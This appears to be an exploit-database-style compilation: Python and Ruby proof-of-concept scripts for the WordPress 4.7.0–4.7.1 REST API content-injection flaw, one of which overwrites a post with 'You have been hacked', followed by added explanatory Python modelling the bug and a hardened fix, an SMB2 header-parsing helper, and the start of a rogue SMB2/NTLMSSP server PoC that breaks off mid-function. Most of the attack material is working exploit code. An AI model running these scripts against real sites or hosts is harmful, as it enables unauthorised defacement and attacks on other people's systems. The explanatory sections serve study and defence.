# $ python inject.py http://localhost:8070/ 1 content
# * Discovering API Endpoint
# * API lives at: http://localhost:8070/wp-json/
# * Updating post 1
# * Post updated. Check it out at http://localhost:8070/archives/1
# * Update complete!
import json
import sys
import urllib2
from lxml import etree
def get_api_url(wordpress_url):
response = urllib2.urlopen(wordpress_url)
data = etree.HTML(response.read())
u = data.xpath('//link[@rel="https://api.w.org/"]/@href')[0]
# check if we have permalinks
if 'rest_route' in u:
print(' ! Warning, looks like permalinks are not enabled. This might not work!')
return u
def get_posts(api_base):
    response = urllib2.urlopen(api_base + 'wp/v2/posts')
    posts = json.loads(response.read())
    for post in posts:
        print(' - Post ID: {0}, Title: {1}, Url: {2}'
              .format(post['id'], post['title']['rendered'], post['link']))
def update_post(api_base, post_id, post_content):
# more than just the content field can be updated. see the api docs here:
# https://developer.wordpress.org/rest-api/reference/posts/#update-a-post
data = json.dumps({
'content': post_content
})
url = api_base + 'wp/v2/posts/{post_id}/?id={post_id}abc'.format(post_id=post_id)
req = urllib2.Request(url, data, {'Content-Type': 'application/json'})
response = urllib2.urlopen(req).read()
print('* Post updated. Check it out at {0}'.format(json.loads(response)['link']))
def print_usage():
print('Usage: {0} <url> (optional: <post_id> <file with post_content>)'.format(__file__))
if __name__ == '__main__':
# ensure we have at least a url
if len(sys.argv) < 2:
print_usage()
sys.exit(1)
# if we have a post id, we need content too
if 2 < len(sys.argv) < 4:
print('Please provide a file with post content with a post id')
print_usage()
sys.exit(1)
print('* Discovering API Endpoint')
api_url = get_api_url(sys.argv[1])
print('* API lives at: {0}'.format(api_url))
    # if we only have a url, show the posts we have
if len(sys.argv) < 3:
print('* Getting available posts')
get_posts(api_url)
sys.exit(0)
# if we get here, we have what we need to update a post!
print('* Updating post {0}'.format(sys.argv[2]))
with open(sys.argv[3], 'r') as content:
new_content = content.readlines()
update_post(api_url, sys.argv[2], ''.join(new_content))
print('* Update complete!')
# Exploit Title: WP Content Injection
# Date: 31 Jan' 2017
# Exploit Author: Harsh Jaiswal
# Vendor Homepage: http://wordpress.org
# Version: Wordpress 4.7 - 4.7.1 (Patched in 4.7.2)
# Tested on: Backbox ubuntu Linux
# Based on https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html
# Credits : Marc, Sucuri, Brute
# usage : gem install rest-client
# Lang : Ruby
require 'rest-client'
require 'json'
puts "Enter Target URI (With wp directory)"
targeturi = gets.chomp
puts "Enter Post ID"
postid = gets.chomp.to_i
response = RestClient.post(
"#{targeturi}/index.php/wp-json/wp/v2/posts/#{postid}",
{
"id" => "#{postid}justrawdata",
"title" => "You have been hacked",
"content" => "Hacked please update your wordpress version"
}.to_json,
:content_type => :json,
:accept => :json
) {|response, request, result| response }
if(response.code == 200)
puts "Done! '#{targeturi}/index.php?p=#{postid}'"
else
puts "This site is not Vulnerable"
end
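Both PoCs above exploit the same thing: a post id such as `1justrawdata` (or `1abc` in the query string) passes the endpoint's permission check yet is still applied to post 1. The Python 3 script below is an added example, not code from WordPress or from either PoC, modelling the id handling that the Sucuri write-up linked above describes for the 4.7.0/4.7.1 REST API. The posts table and author field are invented for the demo; the two PHP behaviours being modelled are is_numeric("1abc") being false, so the permission check finds no post and raises no objection, and (int)"1abc" being 1, so the update still resolves to a real post. The hardened function resolves the id once, strictly, and authorises against that one object.

```python
import re

# Added example, not code from WordPress or from either PoC above: a Python 3
# model of the id handling the linked Sucuri write-up describes for the
# 4.7.0/4.7.1 REST API. The posts table and the author field are invented for
# the demo; the two PHP behaviours being modelled are is_numeric("1abc") ==
# false (the permission check finds no post and raises no objection) and
# (int)"1abc" == 1 (the update still resolves to a real post).

POSTS = {1: {"title": "test", "content": "foo", "author": "admin"}}


def php_is_numeric(value):
    """PHP is_numeric(): ints, or strings that are entirely a decimal number."""
    if isinstance(value, int):
        return True
    return re.fullmatch(r"\s*[+-]?(\d+\.?\d*|\.\d+)([eE][+-]?\d+)?", str(value)) is not None


def php_int_cast(value):
    """PHP (int) on a string: the leading integer prefix, or 0 if there is none."""
    if isinstance(value, int):
        return value
    m = re.match(r"\s*[+-]?\d+", str(value))
    return int(m.group()) if m else 0


def get_post(post_id):
    """Models the strict lookup used by the permission check: a non-numeric id yields no post at all."""
    if not php_is_numeric(post_id):
        return None
    return POSTS.get(int(float(post_id)))


def vulnerable_update(request, user):
    """Permission check and action resolve request['id'] differently (the 4.7.1 pattern)."""
    post = get_post(request["id"])                 # "1justrawdata" -> None, so nothing to object to
    if post is not None and post["author"] != user:
        return "403 cannot edit"
    post_id = php_int_cast(request["id"])          # "1justrawdata" -> 1
    post = POSTS.get(post_id)
    if post is None:
        return "404 no such post"
    post["content"] = request["content"]
    return "200 updated %d" % post_id


def hardened_update(request, user):
    """Resolve the id once and strictly, then authorise and act on that one object."""
    raw = str(request["id"])
    if not re.fullmatch(r"\d+", raw):
        return "400 invalid id"
    post = POSTS.get(int(raw))
    if post is None:
        return "404 no such post"
    if user is None or post["author"] != user:
        return "403 cannot edit"
    post["content"] = request["content"]
    return "200 updated %s" % raw


if __name__ == "__main__":
    print(vulnerable_update({"id": "1", "content": "x"}, None))             # 403: a well-formed id is checked
    print(vulnerable_update({"id": "1justrawdata", "content": "x"}, None))  # 200: check bypassed, post 1 changed
    print(hardened_update({"id": "1justrawdata", "content": "x"}, None))    # 400
```

The general lesson is the one the fix in 4.7.2 applied: validate and resolve untrusted identifiers exactly once, and never let the authorisation step and the action step derive their own, different interpretations of the same input.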
# Full Proof of Concept:
# https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41222.zip
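The server code that follows reads SMB2 header fields out of the raw request by fixed slice (CreditCharge at data[10:12], the credit request at data[18:20], MessageId at data[28:36], SessionId at data[44:52]) and builds its negotiate response from hard-coded byte strings. The Python 3 script below is an added example, not part of the PoC: it lays the 64-byte SMB2 header out as a struct (MS-SMB2 section 2.2.1.2) together with the 4-byte NetBIOS session-service length prefix, which is where those slice offsets come from (header offsets 6, 14, 24 and 40 plus the prefix), and writes the FILETIME conversion used for SystemTime with an explicit little-endian pack. All header values used are constructed for the demo.

```python
import struct
from datetime import datetime, timezone

# Added example, not part of the PoC that follows: the 64-byte SMB2 header
# (MS-SMB2 2.2.1.2) as a struct layout, together with the 4-byte NetBIOS
# session-service length prefix. The PoC's fixed slices (CreditCharge
# data[10:12], CreditRequest data[18:20], MessageId data[28:36], SessionId
# data[44:52]) are the header offsets 6, 14, 24 and 40 shifted by that prefix.
# Header values used below are constructed for the demo.

SMB2_MAGIC = b"\xfeSMB"
SMB2_HEADER = struct.Struct("<4sHHIHHIIQIIQ16s")      # little-endian, 64 bytes
FIELDS = ("protocol", "structure_size", "credit_charge", "status", "command",
          "credits", "flags", "next_command", "message_id", "process_id",
          "tree_id", "session_id", "signature")
NT_EPOCH_DELTA = 116444736000000000                  # 1601-01-01 -> 1970-01-01 in 100ns units


def build_header(command, message_id, session_id=0, credit_charge=0, credits=1,
                 flags=0, status=0, tree_id=0, process_id=0xFEFF):
    """Pack an SMB2 header with a zero signature (unsigned session)."""
    return SMB2_HEADER.pack(SMB2_MAGIC, 64, credit_charge, status, command, credits,
                            flags, 0, message_id, process_id, tree_id, session_id, b"\x00" * 16)


def frame(message):
    """NetBIOS session service: 4-byte big-endian length (top byte zero), then the SMB2 message."""
    return struct.pack(">I", len(message)) + message


def parse_header(data, netbios_prefix=True):
    """Unpack the header into a dict; with netbios_prefix the first 4 bytes are the length field."""
    body = data[4:] if netbios_prefix else data
    if len(body) < SMB2_HEADER.size or body[:4] != SMB2_MAGIC:
        raise ValueError("not an SMB2 header")
    return dict(zip(FIELDS, SMB2_HEADER.unpack_from(body)))


def request_credits(data):
    """Same rule as the PoC's GrabCreditRequested: a request for zero credits is treated as one."""
    return parse_header(data)["credits"] or 1


def nt_ticks_from_unix(seconds, microsecond=0):
    """FILETIME ticks (100ns since 1601-01-01 UTC) for a Unix timestamp."""
    return NT_EPOCH_DELTA + seconds * 10_000_000 + microsecond * 10


def nt_timestamp(when):
    """FILETIME as the SystemTime field expects: little-endian 8 bytes."""
    if when.tzinfo is None:
        when = when.replace(tzinfo=timezone.utc)
    return struct.pack("<Q", nt_ticks_from_unix(int(when.timestamp()), when.microsecond))


if __name__ == "__main__":
    pkt = frame(build_header(command=0, message_id=5, session_id=0x1122334455667788, credit_charge=1))
    print("MessageId slice data[28:36] =", pkt[28:36].hex())
    print("SessionId slice data[44:52] =", pkt[44:52].hex())
    print(parse_header(pkt))
    print("SystemTime now =", nt_timestamp(datetime.now(timezone.utc)).hex())
```

Declaring the layout once makes the offsets self-documenting and catches a short or non-SMB2 buffer before any slice is taken; the PoC's bare slices silently return empty strings on truncated input.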
import sys, struct, SocketServer
from collections import OrderedDict  # stdlib equivalent of the odict.py shipped in the PoC zip
from datetime import datetime
from calendar import timegm
class Packet():
fields = OrderedDict([
("data", ""),
])
def __init__(self, **kw):
self.fields = OrderedDict(self.__class__.fields)
for k,v in kw.items():
if callable(v):
self.fields[k] = v(self.fields[k])
else:
self.fields[k] = v
def __str__(self):
return "".join(map(str, self.fields.values()))
def NTStamp(Time):
    # FILETIME: 100ns ticks since 1601-01-01; SMB2 fields are little-endian on the wire
    NtStamp = 116444736000000000 + (timegm(Time.timetuple()) * 10000000)
    return struct.pack("<Q", NtStamp + (Time.microsecond * 10))
def longueur(payload):
length = struct.pack(">i", len(''.join(payload)))
return length
def GrabMessageID(data):
Messageid = data[28:36]
return Messageid
def GrabCreditRequested(data):
CreditsRequested = data[18:20]
if CreditsRequested == "\x00\x00":
CreditsRequested = "\x01\x00"
else:
CreditsRequested = data[18:20]
return CreditsRequested
def GrabCreditCharged(data):
CreditCharged = data[10:12]
return CreditCharged
def GrabSessionID(data):
SessionID = data[44:52]
return SessionID
##################################################################################
class SMBv2Header(Packet):
fields = OrderedDict([
("Proto", "\xfe\x53\x4d\x42"),
("Len", "\x40\x00"),
("CreditCharge", "\x00\x00"),
("NTStatus", "\x00\x00\x00\x00"),
("Cmd", "\x00\x00"),
("Credits", "\x01\x00"),
("Flags", "\x01\x00\x00\x00"),
("NextCmd", "\x00\x00\x00\x00"),
("MessageId", "\x00\x00\x00\x00\x00\x00\x00\x00"),
("PID", "\xff\xfe\x00\x00"),
("TID", "\x00\x00\x00\x00"),
("SessionID", "\x00\x00\x00\x00\x00\x00\x00\x00"),
("Signature", "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"),
])
##################################################################################
class SMB2NegoAns(Packet):
fields = OrderedDict([
("Len", "\x41\x00"),
("Signing", "\x01\x00"),
("Dialect", "\xff\x02"),
("Reserved", "\x00\x00"),
("Guid", "\xea\x85\xab\xf1\xea\xf6\x0c\x4f\x92\x81\x92\x47\x6d\xeb\x72\xa9"),
("Capabilities", "\x07\x00\x00\x00"),
("MaxTransSize", "\x00\x00\x10\x00"),
("MaxReadSize", "\x00\x00\x10\x00"),
("MaxWriteSize", "\x00\x00\x10\x00"),
("SystemTime", NTStamp(datetime.now())),
("BootTime", "\x22\xfb\x80\x01\x40\x09\xd2\x01"),
("SecBlobOffSet", "\x80\x00"),
("SecBlobLen", "\x78\x00"),
("Reserved2", "\x4d\x53\x53\x50"),
("InitContextTokenASNId", "\x60"),
("InitContextTokenASNLen", "\x76"),
("ThisMechASNId", "\x06"),
("ThisMechASNLen", "\x06"),
("ThisMechASNStr", "\x2b\x06\x01\x05\x05\x02"),
("SpNegoTokenASNId", "\xA0"),
("SpNegoTokenASNLen", "\x6c"),
("NegTokenASNId", "\x30"),
("NegTokenASNLen", "\x6a"),
("NegTokenTag0ASNId", "\xA0"),
("NegTokenTag0ASNLen", "\x3c"),
("NegThisMechASNId", "\x30"),
("NegThisMechASNLen", "\x3a"),
("NegThisMech1ASNId", "\x06"),
("NegThisMech1ASNLen", "\x0a"),
("NegThisMech1ASNStr", "\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x1e"),
("NegThisMech2ASNId", "\x06"),
("NegThisMech2ASNLen", "\x09"),
("NegThisMech2ASNStr", "\x2a\x86\x48\x82\xf7\x12\x01\x02\x02"),
("NegThisMech3ASNId", "\x06"),
("NegThisMech3ASNLen", "\x09"),
("NegThisMech3ASNStr", "\x2a\x86\x48\x86\xf7\x12\x01\x02\x02"),
("NegThisMech4ASNId", "\x06"),
("NegThisMech4ASNLen", "\x0a"),
("NegThisMech4ASNStr", "\x2a\x86\x48\x86\xf7\x12\x01\x02\x02\x03"),
("NegThisMech5ASNId", "\x06"),
("NegThisMech5ASNLen", "\x0a"),
("NegThisMech5ASNStr", "\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"),
("NegTokenTag3ASNId", "\xA3"),
("NegTokenTag3ASNLen", "\x2a"),
("NegHintASNId", "\x30"),
("NegHintASNLen", "\x28"),
("NegHintTag0ASNId", "\xa0"),
("NegHintTag0ASNLen", "\x26"),
("NegHintFinalASNId", "\x1b"),
("NegHintFinalASNLen", "\x24"),
("NegHintFinalASNStr", "Server2009@SMB3.local"),
("Data", ""),
])
def calculate(self):
StructLen = str(self.fields["Len"])+str(self.fields["Signing"])+str(self.fields["Dialect"])+str(self.fields["Reserved"])+str(self.fields["Guid"])+str(self.fields["Capabilities"])+str(self.fields["MaxTransSize"])+str(self.fields["MaxReadSize"])+str(self.fields["MaxWriteSize"])+str(self.fields["SystemTime"])+str(self.fields["BootTime"])+str(self.fields["SecBlobOffSet"])+str(self.fields["SecBlobLen"])+str(self.fields["Reserved2"])
SecBlobLen = str(self.fields["InitContextTokenASNId"])+str(self.fields["InitContextTokenASNLen"])+str(self.fields["ThisMechASNId"])+str(self.fields["ThisMechASNLen"])+str(self.fields["ThisMechASNStr"])+str(self.fields["SpNegoTokenASNId"])+str(self.fields["SpNegoTokenASNLen"])+str(self.fields["NegTokenASNId"])+str(self.fields["NegTokenASNLen"])+str(self.fields["NegTokenTag0ASNId"])+str(self.fields["NegTokenTag0ASNLen"])+str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech1ASNId"])+str(self.fields["NegThisMech1ASNLen"])+str(self.fields["NegThisMech1ASNStr"])+str(self.fields["NegThisMech2ASNId"])+str(self.fields["NegThisMech2ASNLen"])+str(self.fields["NegThisMech2ASNStr"])+str(self.fields["NegThisMech3ASNId"])+str(self.fields["NegThisMech3ASNLen"])+str(self.fields["NegThisMech3ASNStr"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegThisMech5ASNId"])+str(self.fields["NegThisMech5ASNLen"])+str(self.fields["NegThisMech5ASNStr"])+str(self.fields["NegTokenTag3ASNId"])+str(self.fields["NegTokenTag3ASNLen"])+str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
AsnLenStart = str(self.fields["ThisMechASNId"])+str(self.fields["ThisMechASNLen"])+str(self.fields["ThisMechASNStr"])+str(self.fields["SpNegoTokenASNId"])+str(self.fields["SpNegoTokenASNLen"])+str(self.fields["NegTokenASNId"])+str(self.fields["NegTokenASNLen"])+str(self.fields["NegTokenTag0ASNId"])+str(self.fields["NegTokenTag0ASNLen"])+str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech1ASNId"])+str(self.fields["NegThisMech1ASNLen"])+str(self.fields["NegThisMech1ASNStr"])+str(self.fields["NegThisMech2ASNId"])+str(self.fields["NegThisMech2ASNLen"])+str(self.fields["NegThisMech2ASNStr"])+str(self.fields["NegThisMech3ASNId"])+str(self.fields["NegThisMech3ASNLen"])+str(self.fields["NegThisMech3ASNStr"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegThisMech5ASNId"])+str(self.fields["NegThisMech5ASNLen"])+str(self.fields["NegThisMech5ASNStr"])+str(self.fields["NegTokenTag3ASNId"])+str(self.fields["NegTokenTag3ASNLen"])+str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
AsnLen2 = str(self.fields["NegTokenASNId"])+str(self.fields["NegTokenASNLen"])+str(self.fields["NegTokenTag0ASNId"])+str(self.fields["NegTokenTag0ASNLen"])+str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech1ASNId"])+str(self.fields["NegThisMech1ASNLen"])+str(self.fields["NegThisMech1ASNStr"])+str(self.fields["NegThisMech2ASNId"])+str(self.fields["NegThisMech2ASNLen"])+str(self.fields["NegThisMech2ASNStr"])+str(self.fields["NegThisMech3ASNId"])+str(self.fields["NegThisMech3ASNLen"])+str(self.fields["NegThisMech3ASNStr"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegThisMech5ASNId"])+str(self.fields["NegThisMech5ASNLen"])+str(self.fields["NegThisMech5ASNStr"])+str(self.fields["NegTokenTag3ASNId"])+str(self.fields["NegTokenTag3ASNLen"])+str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
MechTypeLen = str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech1ASNId"])+str(self.fields["NegThisMech1ASNLen"])+str(self.fields["NegThisMech1ASNStr"])+str(self.fields["NegThisMech2ASNId"])+str(self.fields["NegThisMech2ASNLen"])+str(self.fields["NegThisMech2ASNStr"])+str(self.fields["NegThisMech3ASNId"])+str(self.fields["NegThisMech3ASNLen"])+str(self.fields["NegThisMech3ASNStr"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegThisMech5ASNId"])+str(self.fields["NegThisMech5ASNLen"])+str(self.fields["NegThisMech5ASNStr"])
Tag3Len = str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
#Sec Blob lens
self.fields["SecBlobOffSet"] = struct.pack("<h",len(StructLen)+64)
self.fields["SecBlobLen"] = struct.pack("<h",len(SecBlobLen))
#ASN Stuff
self.fields["InitContextTokenASNLen"] = struct.pack("<B", len(SecBlobLen)-2)
self.fields["ThisMechASNLen"] = struct.pack("<B", len(str(self.fields["ThisMechASNStr"])))
self.fields["SpNegoTokenASNLen"] = struct.pack("<B", len(AsnLen2))
self.fields["NegTokenASNLen"] = struct.pack("<B", len(AsnLen2)-2)
self.fields["NegTokenTag0ASNLen"] = struct.pack("<B", len(MechTypeLen))
self.fields["NegThisMech1ASNLen"] = struct.pack("<B", len(str(self.fields["NegThisMech1ASNStr"])))
self.fields["NegThisMech2ASNLen"] = struct.pack("<B", len(str(self.fields["NegThisMech2ASNStr"])))
self.fields["NegThisMech3ASNLen"] = struct.pack("<B", len(str(self.fields["NegThisMech3ASNStr"])))
self.fields["NegThisMech4ASNLen"] = struct.pack("<B", len(str(self.fields["NegThisMech4ASNStr"])))
self.fields["NegThisMech5ASNLen"] = struct.pack("<B", len(str(self.fields["NegThisMech5ASNStr"])))
self.fields["NegTokenTag3ASNLen"] = struct.pack("<B", len(Tag3Len))
self.fields["NegHintASNLen"] = struct.pack("<B", len(Tag3Len)-2)
self.fields["NegHintTag0ASNLen"] = struct.pack("<B", len(Tag3Len)-4)
self.fields["NegHintFinalASNLen"] = struct.pack("<B", len(str(self.fields["NegHintFinalASNStr"])))
##################################################################################
class SMB2Session1Data(Packet):
fields = OrderedDict([
("Len", "\x09\x00"),
("SessionFlag", "\x01\x00"),
("SecBlobOffSet", "\x48\x00"),
("SecBlobLen", "\x06\x01"),
("ChoiceTagASNId", "\xa1"),
("ChoiceTagASNLenOfLen", "\x82"),
("ChoiceTagASNIdLen", "\x01\x02"),
("NegTokenTagASNId", "\x30"),
("NegTokenTagASNLenOfLen","\x81"),
("NegTokenTagASNIdLen", "\xff"),
("Tag0ASNId", "\xA0"),
("Tag0ASNIdLen", "\x03"),
("NegoStateASNId", "\x0A"),
("NegoStateASNLen", "\x01"),
("NegoStateASNValue", "\x01"),
("Tag1ASNId", "\xA1"),
("Tag1ASNIdLen", "\x0c"),
("Tag1ASNId2", "\x06"),
("Tag1ASNId2Len", "\x0A"),
("Tag1ASNId2Str", "\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"),
("Tag2ASNId", "\xA2"),
("Tag2ASNIdLenOfLen", "\x81"),
("Tag2ASNIdLen", "\xE9"),
("Tag3ASNId", "\x04"),
("Tag3ASNIdLenOfLen", "\x81"),
("Tag3ASNIdLen", "\xE6"),
("NTLMSSPSignature", "NTLMSSP"),
("NTLMSSPSignatureNull", "\x00"),
("NTLMSSPMessageType", "\x02\x00\x00\x00"),
("NTLMSSPNtWorkstationLen","\x1e\x00"),
("NTLMSSPNtWorkstationMaxLen","\x1e\x00"),
("NTLMSSPNtWorkstationBuffOffset","\x38\x00\x00\x00"),
("NTLMSSPNtNegotiateFlags","\x15\x82\x89\xe2"),
("NTLMSSPNtServerChallenge","\x82\x21\x32\x14\x51\x46\xe2\x83"),
("NTLMSSPNtReserved","\x00\x00\x00\x00\x00\x00\x00\x00"),
("NTLMSSPNtTargetInfoLen","\x94\x00"),
("NTLMSSPNtTargetInfoMaxLen","\x94\x00"),
("NTLMSSPNtTargetInfoBuffOffset","\x56\x00\x00\x00"),
("NegTokenInitSeqMechMessageVersionHigh","\x06"),
("NegTokenInitSeqMechMessageVersionLow","\x03"),
("NegTokenInitSeqMechMessageVersionBuilt","\x80\x25"),
("NegTokenInitSeqMechMessageVersionReserved","\x00\x00\x00"),
("NegTokenInitSeqMechMessageVersionNTLMType","\x0f"),
("NTLMSSPNtWorkstationName","SMB3"),
("NTLMSSPNTLMChallengeAVPairsId","\x02\x00"),
("NTLMSSPNTLMChallengeAVPairsLen","\x0a\x00"),
("NTLMSSPNTLMChallengeAVPairsUnicodeStr","SMB5"),
("NTLMSSPNTLMChallengeAVPairs1Id","\x01\x00"),
("NTLMSSPNTLMChallengeAVPairs1Len","\x1e\x00"),
("NTLMSSPNTLMChallengeAVPairs1UnicodeStr","WIN-PRH502RQAFV"),
("NTLMSSPNTLMChallengeAVPairs2Id","\x04\x00"),
("NTLMSSPNTLMChallengeAVPairs2Len","\x1e\x00"),
("NTLMSSPNTLMChallengeAVPairs2UnicodeStr","SMB5.local"),
("NTLMSSPNTLMChallengeAVPairs3Id","\x03\x00"),
("NTLMSSPNTLMChallengeAVPairs3Len","\x1e\x00"),
("NTLMSSPNTLMChallengeAVPairs3UnicodeStr","WIN-PRH502RQAFV.SMB5.local"),
("NTLMSSPNTLMChallengeAVPairs5Id","\x05\x00"),
("NTLMSSPNTLMChallengeAVPairs5Len","\x04\x00"),
("NTLMSSPNTLMChallengeAVPairs5UnicodeStr","SMB5.local"),
("NTLMSSPNTLMChallengeAVPairs7Id","\x07\x00"),
("NTLMSSPNTLMChallengeAVPairs7Len","\x08\x00"),
("NTLMSSPNTLMChallengeAVPairs7UnicodeStr",NTStamp(datetime.now())),
("NTLMSSPNTLMChallengeAVPairs6Id","\x00\x00"),
("NTLMSSPNTLMChallengeAVPairs6Len","\x00\x00"),
])
def calculate(self):
###### Convert strings to Unicode
self.fields["NTLMSSPNtWorkstationName"] = self.fields["NTLMSSPNtWorkstationName"].encode('utf-16le')
self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"].encode('utf-16le')
self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"].encode('utf-16le')
self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"].encode('utf-16le')
self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"].encode('utf-16le')
self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"].encode('utf-16le')
#Packet struct calc:
StructLen = str(self.fields["Len"])+str(self.fields["SessionFlag"])+str(self.fields["SecBlobOffSet"])+str(self.fields["SecBlobLen"])
###### SecBlobLen Calc:
CalculateSecBlob = str(self.fields["NTLMSSPSignature"])+str(self.fields["NTLMSSPSignatureNull"])+str(self.fields["NTLMSSPMessageType"])+str(self.fields["NTLMSSPNtWorkstationLen"])+str(self.fields["NTLMSSPNtWorkstationMaxLen"])+str(self.fields["NTLMSSPNtWorkstationBuffOffset"])+str(self.fields["NTLMSSPNtNegotiateFlags"])+str(self.fields["NTLMSSPNtServerChallenge"])+str(self.fields["NTLMSSPNtReserved"])+str(self.fields["NTLMSSPNtTargetInfoLen"])+str(self.fields["NTLMSSPNtTargetInfoMaxLen"])+str(self.fields["NTLMSSPNtTargetInfoBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])+str(self.fields["NTLMSSPNtWorkstationName"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsId"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsLen"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs2Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs3Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs5Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs7Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs7Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs7UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs6Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs6Len"])
AsnLen = str(self.fields["ChoiceTagASNId"])+str(self.fields["ChoiceTagASNLenOfLen"])+str(self.fields["ChoiceTagASNIdLen"])+str(self.fields["NegTokenTagASNId"])+str(self.fields["NegTokenTagASNLenOfLen"])+str(self.fields["NegTokenTagASNIdLen"])+str(self.fields["Tag0ASNId"])+str(self.fields["Tag0ASNIdLen"])+str(self.fields["NegoStateASNId"])+str(self.fields["NegoStateASNLen"])+str(self.fields["NegoStateASNValue"])+str(self.fields["Tag1ASNId"])+str(self.fields["Tag1ASNIdLen"])+str(self.fields["Tag1ASNId2"])+str(self.fields["Tag1ASNId2Len"])+str(self.fields["Tag1ASNId2Str"])+str(self.fields["Tag2ASNId"])+str(self.fields["Tag2ASNIdLenOfLen"])+str(self.fields["Tag2ASNIdLen"])+str(self.fields["Tag3ASNId"])+str(self.fields["Tag3ASNIdLenOfLen"])+str(self.fields["Tag3ASNIdLen"])
#Packet Struct len
self.fields["SecBlobLen"] = struct.pack("<H", len(AsnLen+CalculateSecBlob))
self.fields["SecBlobOffSet"] = struct.pack("<h",len(StructLen)+64)
###### ASN Stuff
if len(CalculateSecBlob) > 255:
self.fields["Tag3ASNIdLen"] = struct.pack(">H", len(CalculateSecBlob))
else:
self.fields["Tag3ASNIdLenOfLen"] = "\x81"
self.fields["Tag3ASNIdLen"] = struct.pack(">B", len(CalculateSecBlob))
if len(AsnLen+CalculateSecBlob)-3 > 255:
self.fields["ChoiceTagASNIdLen"] = struct.pack(">H", len(AsnLen+CalculateSecBlob)-4)
else:
self.fields["ChoiceTagASNLenOfLen"] = "\x81"
self.fields["ChoiceTagASNIdLen"] = struct.pack(">B", len(AsnLen+CalculateSecBlob)-3)
if len(AsnLen+CalculateSecBlob)-7 > 255:
self.fields["NegTokenTagASNIdLen"] = struct.pack(">H", len(AsnLen+CalculateSecBlob)-8)
else:
self.fields["NegTokenTagASNLenOfLen"] = "\x81"
self.fields["NegTokenTagASNIdLen"] = struct.pack(">B", len(AsnLen+CalculateSecBlob)-7)
tag2length = CalculateSecBlob+str(self.fields["Tag3ASNId"])+str(self.fields["Tag3ASNIdLenOfLen"])+str(self.fields["Tag3ASNIdLen"])
if len(tag2length) > 255:
